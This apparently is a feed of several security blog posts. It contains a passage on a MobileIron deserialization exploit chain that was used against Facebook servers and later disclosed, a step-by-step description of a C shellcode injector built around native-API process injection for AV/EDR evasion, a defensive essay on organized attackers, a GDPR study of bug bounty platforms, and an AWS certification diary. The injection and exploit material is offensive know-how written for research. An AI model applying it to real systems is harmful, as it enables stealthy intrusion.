目標的 ClassPath 上剛好有 Groovy 存在! 於是我們又讓 Meta Programming 偉大了一次 :D

然而事實上,目標伺服器上 Groovy 版本為 1.5.6,是一個距今十年前老舊到不支援 Meta Programming 的版本,所以我們最後還是基於 Groovy 的程式碼,重新尋找了一個在 GroovyShell 上的利用鏈! 詳細的利用鏈可參考我送給 JNDI-Injection-Bypass 的這個 Pull Request!

攻擊 Facebook

現在我們已經有了一個基於 JNDI + BeanFactory + GroovyShell 的完美遠端程式碼執行漏洞,接下來就開始攻擊 Facebook 吧! 從前文提到,我們在 2016 年時就已知 Facebook 使用 MobileIron 當作他們的 MDM 解決方案,雖然現在再檢查一次發現首頁直接變成 403 Forbidden 了,不過幸運的是 Web Service 層並無阻擋! s

萬事俱備,只欠東風! 正當要攻擊 Facebook 的前幾天,我們突然想到,從上次進入 Facebook 伺服器的經驗,由於安全上的考量,Facebook 似乎會禁止所有對外部非法的連線,這點對我們 JNDI 注入攻擊有著至關重要的影響! 首先,JNDI 注入的核心就是透過受害者連線至攻擊者控制的惡意伺服器,並接收回傳的惡意 Naming Reference 後所導致的一系列利用,但現在連最開始的連線到攻擊者的惡意伺服器都無法,更別談後續的利用。


自此,我們關於 JNDI 注入的路已全被封殺,只能回到 Hessian 反序列化重新思考! 而現有的利用鏈皆無法達到遠端程式碼執行,所以我們勢必得拋棄 JNDI 注入,尋找一個新的利用鏈!



為了尋找新的利用鏈,必須先深入理解已存在利用鏈的原理及成因,在重讀 Java Unmarshaller Security 的論文後,我對其中一句話感到了好奇:

Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception.


哦,為什麼作者要特地補上這句話呢? 我開始有個猜想:

作者評估過把 Groovy 當成利用鏈的可行性,雖然被限制住了,但一定覺得有機會才會寫進論文中!


從這個猜想出發,雖然 Groovy 的利用鏈被 readResolve() 限制住了,但剛好我們目標版本的 Groovy 很舊,說不定尚未把這個限制加入程式庫!

我們比較了一下 Groovy-1.5.6 與最新版本位於 groovy/runtime/MethodClosure.java 中的 readSolve() 實現:

$ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java

>     private Object readResolve() {
>         if (ALLOW_RESOLVE) {
>             return this;
>         }
>         throw new UnsupportedOperationException();
>     }

可以看到的確在舊版是沒有 ALLOW_RESOLVE 限制的,而後來經過考古後也發現,這個限制其實 Groovy 自己為了因應 2015 年所出現 Java 反序列化漏洞的減緩措施,因此也被分配了 CVE-2015-3253 這個漏洞編號! 由於 Groovy 只是一個只在內部使用、不會對外的小配角,因此在沒有特別需求下開發者也不會特地去更新它,因此成為了我們攻擊鏈的一環! 這也再一次驗證了「任何看似舉無輕重的小元件,都有可能成為你被攻擊的主因」!

最後,當然! 我們成功的取得在 Facebook 伺服器上的 Shell,以下是影片:

漏洞通報與修復

我們約在三月時完成整個漏洞研究,並在 4/3 日將研究成果寫成報告,透過 [email protected] 回報給 MobileIron! 官方收到後著手開始修復,在 6/15 釋出修補程式並記錄了三個 CVE 編號,詳細的修復方式請參閱 MobileIron 官方網站!

  • CVE-2020-15505 - Remote Code Execution
  • CVE-2020-15506 - Authentication Bypass
  • CVE-2020-15507 - Arbitrary File Reading

當官方釋出修補程式後,我們也開始監控世界上所有有使用 MobileIron 企業的修復狀況,這裡只單純檢查靜態檔案的 Last-Modified Header,結果僅供參考不完全代表實際情況(Unknown 代表未開 443/8443 無法利用):


與此同時,我們也持續監控著 Facebook,並在 15 天確認都未修補後於 7/2 日成功進入 Facebook 伺服器後回報 Facebook Bug Bounty Program!

結語

到此,我們已經成功示範了如何尋找一個 MDM 伺服器的漏洞! 從繞過 Java 語言層級的保護、網路限制,到寫出攻擊程式並成功的利用在 Bug Bounty Program 上! 因為文長,還有許多來不及分享的故事,這裡僅條列一下供有興趣繼續研究的人參考!

  • 如何從 MDM 伺服器,控制回員工的手機裝置
  • 如何分析 MobileIron 的私有 MI Protocol
  • CVE-2020-15506 本質上其實是一個很有趣的認證繞過漏洞

希望這篇文章能夠喚起大眾對於 MDM 攻擊面的注意,以及企業安全的重要性! 感謝收看 :D

SeasideBishop: A C port of the UrbanBishop shellcode injector

3 September 2020 at 15:20

SeasideBishop: A C port of b33f’s UrbanBishop shellcode injector

Introduction

This post covers a recent C port I wrote of b33f’s neat C# shellcode loader UrbanBishop. The prolific Rastamouse also did a veriation of UrbanBishop, using D/Invoke, called RuralBishop. This injection method has some quirks I hadn’t seen done before, so I thought it would be interesting to port it to C.

Credit of course goes to b33f, Rastamouse as well, and special thanks to AsaurusRex and Adamant for their help in getting it working.

The code for this post is available here.

The Code

First, a quick outline of the injection method, and then I will break it down API by API. SeasideBishop creates a section and maps a view of it locally, opens a handle to a remote process, maps a view of that same section into the process, and copies shellcode into the local view. As as view of the same section is also mapped in the remote process, the shellcode has now been allocated across processes. Next a remote thread is created and an APC is queued on it. The thread is alerted and the shellcode runs.

Opening The Remote Process

get-pid

Above we see the use of the native API NtOpenProcess to acquire a handle to the remote process. Native APIs calls are used throughout SeasideBishop as they tend to be a bit more stealthy than Win32 APIs, though they are still vulnerable to userland hooking.

Sections

A neat feature of this technique is the way that the shellcode is allocated in the remote process. Instead of using a more common and suspicious API like WriteProcessMemory, which is well known to AV/EDR products, SeasideBishop takes advantage of memory mapped files. This is a way of copying some or all of a file into memory and operating on it there, rather than manipulating it directly on disk. Another way of using it, which we will do here, is as an inter-process communication (IPC) mechanism. The memory mapped file does not actually need to be an ordinary file on disk. It can be simply a region of memory backed by the system page file. This way two processes can map the same region in their own address space, and any changes are immediately accessible to the other.

The way a region of memory is mapped is by calling the native API NtCreateSection. As the name indicates, a section, or section object, is the term for the memory mapped region.

create-section

Above is the call to NtCreateSection within the local process. We create a section with a size of 0x1000, or 4096 bytes. This is enough to hold our demo shellcode, but might need to be increased to accommodate a larger payload. Note that the allocation will be rounded up to the nearest page size, which is normally 4k.

The next step is to create a view of the section. The section object is not directly manipulated, as it represents the file-backed region of memory. We create a view of the section and make changes to that view. The remote process can also map a view using the same section handle, thereby accessing the same section. This is what allows IPC to happen.

local-map-section

Here we see the call to NtMapViewOfSection to create the view in the local process. Notice the use of RW and not RWX permissions, as we simply need to write the shellcode to the view.

memcpy

Next a simple memcpy writes our shellcode to the view.

remote-map-section

Finally we map a view of the same section in the remote process. Note that this time we use RX permissions so that the shellcode is executable. Now we have our shellcode present in the remote process’s memory, without using APIs like WriteProcessMemory. Now let’s work on executing it.

Starting From The End

In order to execute our shellcode in the remote process, we need a thread. In order to create one, we need to give the thread a function or address to begin executing from. Though we are not using Win32 APIs, the documentation for CreateRemoteThreadEx still applies. We need a “pointer to [an] application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and [serve as] the starting address of the thread in the remote process. The function must exist in the remote process.” The function we will use is RtlExitUserThread. This is not a very well documented function, but debugging indicates that this function is part of the thread termination process. So if we tell our thread to begin executing at this function, we are guaranteed that the thread will exit gracefully. That’s always a good thing when injecting into remote processes.

So now that we know the thread will exit, how do we get it to execute our code? We’ll get there soon, but first we need to get the address of RtlExitUserThread so that we can use it as the start address of our new remote thread.

function-address

There’s a lot going on here, but it’s really pretty simple. RtlExitUserThread is exported by ntdll.dll, so we need the DLL base address first before we can access its exports. We create the Unicode string needed by the LdrGetDllHandle native API call and then call it to get the address of ntdll.dll. With that done, we need to create the ANSI string required by LdrGetProcedureAddress to get the address of the RtlExitUserThread function. Again, notice no suspicious calls to LoadLibrary or GetProcAddress here.

Creating The Thread

Now that we have our thread start address, we can create it in the remote process.

create-remote-thread

Here we have the call to NtCreateThreadEx that creates the thread in the target process. Note the use of the pRemoteFunction variable, which contains the start address of RtlExitUserThread. Note also that the true argument above is a Boolean value for the CreateSuspended parameter, which means that the thread will be created in a suspended state and will not immediately begin executing. This will give us time to tell it about the shellcode we’d like it to run.

Execution

We’re in the home stretch now. The shellcode is in the remote process and we have a thread ready to execute it. We just need to connect the two together. To do that, we will queue an Asynchronous Procedure Call (APC) on the remote thread. APCs are a way of asynchronously letting a thread know that we have work for it to do. Each thread maintains an APC queue. When the thread is next scheduled, it will check that queue and run any APCs that are waiting for it, and then continue with its normal work. In our case, that work will be to run the RtlExitUserThread function and therefore exit gracefully.

queue-apc

Here we see how the thread and our shellcode meet. We use NtQueueApcThread to queue an APC onto the remote thread, using lpRemoteSection to point to the view containing the shellcode we mapped into the remote process earlier. Once the thread is alerted, it will check its APC queue and see our APC waiting for it.

alert-thread

A quick call to NtAlertResumeThread and the thread is alerted and runs our shellcode. Which of course pops the obligatory calc.

calc

Conclusion

I thought this was a neat injection method, with some quirks I hadn’t seen before, and I enjoyed porting it over to C and learning the concepts behind it in more detail. Hopefully others will find this useful as well.

Thanks again to b33f, Rasta, Adamant, and AsaurusRex for their help!

敵人不是勒贖軟體,而是組織型駭客

20 August 2020 at 16:00

前言

駭客攻擊事件一直存在於真實世界,只是鮮少被完整公開揭露。今年國內一些重大關鍵基礎設施 (Critical Information Infrastructure Protection,CIIP) 以及國內的跨國企業紛紛發生嚴重的資安事件,我們想簡單的跟大家談談這些事件背後企業真正需要思考及重視的核心問題。

企業面對的是組織型駭客而不只是勒贖軟體

不知道是因為勒贖軟體比較吸睛還是什麼緣故,媒體比較喜歡用勒贖軟體作為標題呈現近年企業面臨的重大威脅。實際上,勒贖軟體只是攻擊過程的工具、加密只是勒贖的手段之一,甚至包含竊取機敏資料。因為這些事件我們沒有參與調查或相關的活動,我們僅就已公開揭露的資料來一窺面對這樣的威脅,企業的具體做法有哪些?

根據法務部調查局在 iThome 2020 資安大會的分享

在這起攻擊事件中,駭客首先從 Web 伺服器、員工電腦等途徑,入侵公司系統長期潛伏及探測,而後竊取帳號權限,進入 AD 伺服器,利用凌晨時段竄改群組派送原則(GPO),同時預埋 lc.tmp 惡意程式到內部伺服器中,等到員工上班打開電腦後,電腦立即套用遭竄改的 GPO,依據指令就會自動將勒索軟體載到記憶體中來執行。

企業在被勒贖軟體加密後,往往第一時間容易直覺想到防毒軟體或端點防護設備為何沒有生效?現實是,如果企業面對的是針對式的攻擊(Advanced Persistent Threat,APT),攻擊者勢必會研究可以繞過企業的防護或監控的方式。所以企業要思考的應該是一個防禦戰線或更為全面的防護策略,而非仰賴單一的資安設備或服務。

從上述的敘述,我們可以發現幾個問題:

  1. Web 伺服器具有可利用的漏洞,而這個漏洞可能導致主機被取得權限進行後續的橫向移動。造成這個問題的原因可能包含:
    • 系統從未進行高強度的滲透測試及定期執行弱點掃描
    • 屬於老舊無法修補的系統(使用老舊的框架、程式語言)或是廠商已經不再維護
    • 一次性的活動網站或測試網站,活動或測試結束後未依照程序下線,成為企業防禦破口
    • 不在企業盤點的防護範圍內(如前端未設置 WAF)
  2. 從員工電腦或是 Web 伺服器可以逐步跳到 AD 伺服器,可能存在的問題則包含:
    • 網路間的區隔不嚴謹,例如未依照資料或系統的重要性進行區隔
    • 同網段伺服器間的通訊方式管控不當,沒有開啟或管制重要伺服器的通訊埠或限制來源 IP 位址
    • 系統存在可利用取得權限的弱點
  3. 利用凌晨時段竄改群組派送原則:最後是回應機制未即時(包含人員接獲告警後處理不當),企業對於具有集中管理權限的重要系統,例如 AD Server、資產管理軟體等這類型的主機,除了對特權帳號高強度的管理外(如 OTP),也應該針對「異常帳號登入」、「異常帳號新增到群組」、「正常帳號異常登入時間」、「新增排程或 GPO」等行為發出告警;而各種告警也應該依照資產的重要性訂定不同的 SLA 回應與處理。

你需要更全面、目標導向的方式思考企業資安現況

我們在近三年的紅隊演練,以企業對其營運最關鍵的資訊資產作為演練標的,並模擬組織型駭客的攻擊模式,透過外部情搜、取得外部系統權限、橫向移動、持續取得更多內部伺服器權限及提權、破解密碼,最終達到企業指定的關鍵資產執行演練情境。而企業透過高強度且精準的演練過程,除了明確掌握可被入侵的路徑外,更得以檢視上述問題的不足並持續改善。

我們認為,只要你的企業夠重要(對駭客而言重要,而不是自己覺得重要),組織型的攻擊就不會停歇!企業唯有不斷的找出自己不足之處,持續提升自己的防禦強度才是能真正降低風險的正確作法。

至於「第三方供應鏈安全」及「如何更完整的制定資安策略」,我們將找時間另外跟大家說明。

Bug Bounty Platforms vs. GDPR: A Case Study

22 July 2020 at 00:00

What Do Bug Bounty Platforms Store About Their Hackers?

I do care a lot about data protection and privacy things. I’ve also been in the situation, where a bug bounty platform was able to track me down due to an incident, which was the initial trigger to ask myself:

How did they do it? And do I know what these platforms store about me and how they protect this (my) data? Not really. So why not create a little case study to find out what data they process?

One utility that comes in quite handy when trying to get this kind of information (at least for Europeans) is the General Data Protection Regulation (GDPR). The law’s main intention is to give people an extensive right to access and restrict their personal data. Although GDPR is a law of the European Union, it is extra-territorial in scope. So as soon as a company collects data about a European citizen/resident, the company is automatically required to comply with GDPR. This is the case for all bug bounty platforms that I am currently registered on. They probably cover 98% of the world-wide market: HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter.

Spoiler: All of them have to be GDPR-compliant, but not all seem to have proper processes in place to address GDPR requests.

Creating an Even Playing Field

To create an even playing field, I’ve sent out the same GDPR request to all bug bounty platforms. Since the scenario should be as realistic and real-world as possible, no platform was explicitly informed beforehand that the request, respectively, their answer, is part of a study.

  • All platforms were given the same questions, which should cover most of their GDPR response processes (see Art. 15 GDPR):
  • All platforms were given the same email aliases to include in their responses.
  • All platforms were asked to hand over a full copy of my personal data.
  • All platforms were given a deadline of one month to respond to the request. Given the increasing COVID situation back in April, all platforms were offered an extension of the deadline (as per Art. 12 par. 3 GDPR).

Analyzing the Results

First of all, to compare the responses that are quite different in style, completeness, accuracy, and thoroughness, I’ve decided to only count answers that are a part of the official answer. After the official response, discussions are not considered here, because accepting those might create advantages across competitors. This should give a clear understanding of how thoroughly each platform reads and answers the GDPR request.

Instead of going with a kudos (points) system, I’ve decided to use a “traffic light” rating:

Indicator Expectation
All good, everything provided, expectations met.
Improvable, at least one (obvious) piece of information is missing, only implicitly answered.
Left out, missing a substantial amount of data or a significant data point and/or unmet expectations.

This light system is then applied to the different GDPR questions and derived points either from the questions themselves or from the data provided.

Results Overview

To give you a quick overview of how the different platforms performed, here’s a summary showing the lights indicators. For a detailed explanation of the indicators, have a look at the detailed response evaluations below.

Question HackerOne Bugcrowd Synack Intigriti Zerocopter
Did the platform meet the deadline?
(Art. 12 par. 3 GDPR)
Did the platform explicitly validate my identity for all provided email addresses?
(Art. 12 par. 6 GDPR)
Did the platform hand over the results for free?
(Art. 12 par. 5 GDPR)
Did the platform provide a full copy of my data?
(Art. 15 par. 3 GDPR)
Is the provided data accurate?
(Art. 5 par. 1 (d) GDPR)
Specific question: Which personal data about me is stored and/or processed by you?
(Art. 15 par. 1 (b) GDPR)
Specific question: What is the purpose of processing this data?
(Art. 15 par. 1 (a) GDPR)
Specific question: Who has received or will receive my personal data (including recipients in third countries and international organizations)?
(Art. 15 par. 1 (c) GDPR)
Specific question: If the personal data wasn’t supplied directly by me, where does it originate from?
(Art. 15 par. 1 (g) GDPR)
Specific question: If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR?
(Art. 15 par. 2 GDPR and Art. 46 GDPR)

Detailed Answers

HackerOne

Request sent out: 01st April 2020
Response received: 30th April 2020
Response style: Email with attachment
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. A copy of the VPN access logs/packet dumps was/were not provided.

However, since this is not a general feature, I do not consider this to be a significant data point, but still a missing one.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & last name, email address, IP addresses, phone number, social identities (Twitter, Facebook, LinkedIn), address, shirt size, bio, website, payment information, VPN access & packet log HackerOne provided a quite extensive list of IP addresses (both IPv4 and IPv6) that I have used, but based on the provided dataset it is not possible to say when they started recording/how long those are retained.

HackerOne explicitly mentioned that they are actively logging VPN packets for specific programs. However, they currently do not have any ability to search in it for personal data (it’s also not used for anything according to HackerOne)
What is the purpose of processing this data? Operate our Services, fulfill our contractual obligations in our service contracts with customers, to review and enforce compliance with our terms, guidelines, and policies, To analyze the use of the Services in order to understand how we can improve our content and service offerings and products, For administrative and other business purposes, Matching finders to customer programs -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Zendesk, PayPal, Slack, Intercom, Coinbase, CurrencyCloud, Sterling While analyzing the provided dataset, I noticed that the list was missing a specific third-party called “TripActions”, which is used to book everything around live hacking events. This is a missing data point, but it’s also only a non-general one, so the indicator is only orange.

HackerOne added the data point as a result of this study.
If the personal data wasn’t supplied directly by me, where does it originate from? HackerOne does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? This question wasn’t answered as part of the official response. I’ve notified HackerOne about the missing information afterwards, and they’ve provided the following:

Vendors must undergo due diligence as required by GDPR, and where applicable, model clauses are in place.

Remarks

HackerOne provided an automated and tool-friendly report. While the primary information was summarized in an email, I’ve received quite a huge JSON file, which was quite easily parsable using your preferred scripting language. However, if a non-technical person would receive the data this way, they’d probably have issues getting useful information out of it.

Bugcrowd

Request sent out: 1st April 2020
Response received: 17th April 2020
Response style: Email with a screenshot of an Excel table
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? No identity validation was performed. I’ve sent the request to their official support channel, but there was no explicit validation to verify it’s really me, for neither of my provided email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. Bugcrowd provided a screenshot of what looks like an Excel file with a couple of information on it. In fact, the screenshot you can see above is not even a sample but their complete response.
However, the provided data is not complete since it misses a lot of data points that can be found on the researcher portal, such as a history of authenticated devices (IP addresses see your sessions on your Bugcrowd profile), my ISC2 membership number, everything around the identity verification.

There might be more data points such as logs collected through their (for some programs) required proxies or VPN endpoints, which is required by some programs, but no information was provided about that.

Bugcrowd did neither provide anything about all other given email addresses, nor did they deny to have anything related to them.
Is the provided data accurate? No. The provided data isn’t accurate. Address information, as well as email addresses and payment information are super old (it does not reflect my current Bugcrowd settings), which indicates that Bugcrowd stores more than they’ve provided.
Which personal data about me is stored and/or processed by you? First & last name, address, shirt size, country code, LinkedIn profile, GooglePlus address, previous email address, PayPal email address, website, current IP sign-in, bank information, and the Payoneer ID This was only implicitly answered through the provided copy of my data.

As mentioned before, it seems like there is a significant amount of information missing.
What is the purpose of processing this data? - This question wasn’t answered.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? - This question wasn’t answered.
If the personal data wasn’t supplied directly by me, where does it originate from? - This question wasn’t answered.
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This question wasn’t answered.

Remarks

The “copy of my data” was essentially the screenshot of the Excel file, as shown above. I was astonished about the compactness of the answer and asked again to answer all the provided questions as per GDPR. What followed was quite a long discussion with the responsible personnel at Bugcrowd. I’ve mentioned more than once that the provided data is inaccurate and incomplete and that they’ve left out most of the questions, which I have a right by law to get an answer to. Still, they insisted that all answers were GDPR-compliant and complete.

I’ve also offered them an extension of the deadline in case they needed more time to evaluate all questions. However, Bugcrowd did not want to take the extension. The discussion ended with the following answer on 17th April:

We’ve done more to respond to you that any other single GDPR request we’ve ever received since the law was passed. We’ve done so during a global pandemic when I think everyone would agree that the world has far more important issues that it is facing. I need to now turn back to those things.

I’ve given up at that point.

Synack

Request sent out: 25th March 2020
Response received: 03th July 2020
Response style: Email with a collection of PDFs, DOCXs, XLSXs
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, with an extension of 2 months. Synack explicitly requested the extension.
Did the platform explicitly validate my identity for all provided email addresses? No. I’ve sent the initial request via their official support channel, but no further identity verification was done.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Very likely not. Synack uses a VPN solution called “LaunchPoint”, respectively “LaunchPoint+” which requires every participant to go through when testing targets. What they do know - at least - is when I am connected to the VPN, which target I am connected to, and how long I am connected to it. However, neither a connection log nor a full dump was provided as part of the data copy.

The same applies to the system called “TUPOC”, which was not mentioned.

Synack did neither provide anything about all other given email addresses nor did they deny to have anything related to them.

Since I do consider these to be significant data points in the context of Synack that weren’t provided, the indicator is red
Is the provided data accurate? Yes. The data that was provided is accurate, though.
Which personal data about me is stored and/or processed by you? Identity information: full name, location, nationality, date of birth, age, photograph, passport or other unique ID number, LinkedIn Profile, Twitter handle, website or blog, relevant certifications, passport details (including number, expiry data, issuing country), Twitter handle and Github handle

Taxation information: W-BEN tax form information, including personal tax number

Account information: Synack Platform username and password, log information, record of agreement to the Synack Platform agreements (ie terms of use, code of conduct, insider trading policy and privacy policy) and vulnerability submission data;

Contact details: physical address, phone number, and email address

Financial information: bank account details (name of bank, BIC/SWIFT, account type, IBAN number), PayPal account details and payment history for vulnerability submissions

Data with respect to your engagement on the Synack Red Team: Helpdesk communications with Synack, survey response information, data relating to the vulnerabilities you submitted through the Synack Platform and data related to your work on the Synack Platform
Compared to the provided data dump, a couple of information are missing: last visited date, last clicks on link tracking in emails, browser type and version, operating system, and gender are not mentioned, but still processed.

“Log information” in the context of “Account information” and “data related to your work on the Synack Platform” in the context of “Data with respect to your engagement on the Synack Red Team” are too vague since it could be anything.

There is no mention of either LaunchPoint, LaunchPoint+ or TUPOC details.

Since I do consider these to be significant data points in the context of Synack, the indicator is red.
What is the purpose of processing this data? Recruitment, including screening of educational and professional background data prior to and during the course of the interviewing process and engagement, including carrying out background checks (where permitted under applicable law).

Compliance with all relevant legal, regulatory and administrative obligations

The administration of payments, special awards and benefits, the management, and the reimbursement of expenses.

Management of researchers

Maintaining and ensuring the communication between Synack and the researchers.

Monitoring researcher compliance with Synack policies

Maintaining the security of Synack’s network customer information
A really positive aspect of this answer is that Synack included the retention times of each data point.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Cloud storage providers (Amazon Web Services and Google), identification verification providers, payment processors (including PayPal), customer service software providers, communication platforms and messaging platform to allow us to process your customer support tickets and messages, customers, background search firms, applicant tracking system firm. Synack referred to their right to mostly only name “categories of third-parties” except for AWS and Google. While this shows some transparency issues, it is still legal to do so.
If the personal data wasn’t supplied directly by me, where does it originate from? Synack does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? Synack engages third-parties in connection with the operation of Synack’s crowdsourced penetration testing business. To the extent your personal data is stored by these third- party providers, they store your personal data in either the European Economic Area or the United States. The only thing Synack states here is that data is stored in the EEA or the US, but the storage itself is not a safeguard. Therefore the indicator is red.

Remarks

The communication process with Synack was rather slow because it seems like it takes them some time to get information from different vendors.

Update 23rd July 2020:
One document was lost in the conversations with Synack, which turns a couple of their points from red to green. The document was digitally signed, and due to the added proofs, I can confirm that it has been signed within the deadline set for their GDPR request. The document itself tries to answer the specific questions, but there are some inconsistencies compared to the also attached copy of the privacy policy (in terms of data points being named in one but not the other document), which made it quite hard to create a unique list of data points. However, I’ve still updated the table for Synack accordingly.

Intigriti

Request sent out: 07th April 2020
Response received: 04th May 2020
Response style: Email with PDF and JSON attachments.
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes. Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First- & lastname, address, phone number, email address, website address, Twitter handle, LinkedIn page, shirt size, passport data, email conversation history, accepted program invites, payment information (banking and PayPal), payout history, IP address history of successful logins, history of accepted program terms and conditions, followed programs, reputation tracking, the time when a submission has been viewed.

Data categories processed: User profile information, Identification history information, Personal preference information, Communication preference information, Public preference information, Payment methods, Payout information, Platform reputation information, Program application information, Program credential information, Program invite information, Program reputation information, Program TAC acceptance information, Submission information, Support requests, Commercial requests, Program preference information, Mail group subscription information, CVR Download information, Demo request information, Testimonial information, Contact request information.
I couldn’t find any missing data points.

A long, long time ago, Intigriti had a VPN solution enabled for some of their customers, but I haven’t seen it active anymore since then, so I do not consider this data point anymore.
What is the purpose of processing this data? Purpose: Public profile display, Customer relationship management, Identification & authorization, Payout transaction processing, Bookkeeping, Identity checking, Preference management, Researcher support & community management, Submission creation & management, Submission triaging, Submission handling by company, Program credential handling, Program inviting, Program application handling, Status reporting, Reactive notification mail sending, Pro-active notification mail sending, Platform logging & performance analysis. -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Intercom, Mailerlite, Google Cloud Services, Amazon Web Services, Atlas, Onfido, Several payment providers (TransferWise, PayPal, Pioneer), business accounting software (Yuki), Intigriti staff, Intigriti customers, encrypted backup storage (unnamed), Amazon SES. I’ve noticed a little contradiction in their report: while saying data is transferred to these parties (which includes third-country companies such as Google and Amazon), they also included a “Data Transfer” section saying “We do not transfer any personal information to a third country.”

After gathering for clarification, Intigriti told me that they’re only hosting in the Europe region in regard to AWS and Google.
If the personal data wasn’t supplied directly by me, where does it originate from? Intigriti does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “We will ensure that any transfer of personal data to countries outside of the European Economic Area will take place pursuant to the appropriate safeguards.”

However, “appropriate safeguards” are not defined.

Remarks

Intigriti provided the most well-written and structured report of all queried platforms, allowing a non-technical reader to get all the necessary information quickly. In addition to that, a bundle of JSON files were provided to read in all data programmatically.

Zerocopter

Request sent out: 14th April 2020
Response received: 12th May 2020
Response style: Email with PDF
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes Zerocopter validated all email addresses that I’ve mentioned in my request by asking personal questions about the account in question and by letting me send emails with randomly generated strings from each address.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First-, last name, country of residence, bio, email address, passport details, company address, payment details, email conversations, VPN log data (retained for one month), metadata about website visits (such as IP addresses, browser type, date and time), personal information as part of security reports, time spent on pages, contact information with Zerocopter themselves such as provided through email, marketing information (through newsletters). I couldn’t find any missing data points.
What is the purpose of processing this data? Optimisation Website, Application, Services, and provision of information, Implementation of the agreement between you and Zerocopter (maintaining contact) -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Some data might be transferred outside the European Economic Area, but only with my consent, unless it is required for agreement implementation between Zerocopter and me, if there is an obligation to transmit it to government agencies, a training event is held, or the business gets reorganized. Zerocopter did not explicitly name any of these third-parties, except for “HubSpot”.
If the personal data wasn’t supplied directly by me, where does it originate from? Zerocopter does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “ These third parties (processors) process your personal data exclusively within our assignment and we conclude processor agreements with these third parties which are compliant with the requirements of GDPR (or its Netherlands ratification AVG)”.

Remarks

For the largest part, Zerocopter did only cite their privacy policy, which is a bit hard to read for non-legal people.

Conclusion

For me, this small study holds a couple of interesting findings that might or might not surprise you:

  • In general, it seems that European bug bounty platforms like Intigriti and Zerocopter generally do better or rather seem to be better prepared for incoming GDPR requests than their US competitors.
  • Bugcrowd and Synack seem to lack a couple of processes to adequately address GDPR requests, which unfortunately also includes proper identity verification.
  • Compared to Bugcrowd and Synack, HackerOne did quite well, considering they are also US-based. So being a US platform is no excuse for not providing a proper GDPR response.
  • None of the platforms has explicitly and adequately described the safeguards required from their partners to protect personal data. HackerOne has handed over this data after their official response, Intigriti and Zerocopter have not explicitly answered that question. However, both have (vague) statements about it in their corresponding privacy policies. This point does not seem to be a priority for the platforms, or it’s probably a rather rarely asked question.

See you next year ;-)

AWS Certification Trifecta

28 June 2020 at 11:20

 

 

When the dust settled here’s what I was left with 😛

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head) typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure and Google. It confirmed what I suspected with AWS leading (~34%) Azure having roughly half of AWS (~17%), Google (~6%) and the “others” accounting for the rest. Note: Although Azure owns half of AWS in market share percentage, their annual growth is double that (62%) of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and proposed paths to achieve. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty but I decided not do that. Why? Figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty. To appreciate the view so-to-speak. Security Specialty would be my end goal.

I fumbled my way through deploying AWS workloads previously. I used EC2 before (didn’t know what it stood for or anything beyond that – a VM in the cloud was the depth of my understanding), S3 was cloud storage (that I constantly read about being misconfigured leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure of myself 😅 which is probably magnitudes worse and more intense than what anyone from the outside could inflict on me.


AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practicioner. This involves a ton of sophisticated research better known as Google 🤣 in addition to, trolling all related Reddit threads that I can find. This is how I narrow down what are the best materials to prepare and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometime I have to get outside of my own head. Not sure why I have all the confidence but it’s there (for no reason  in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

    • What is the cloud & what they’re made of
    • IAM Users, Groups, Roles
    • VPCs
    • EC2
    • S3
    • Cloudfront & DNS
    • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

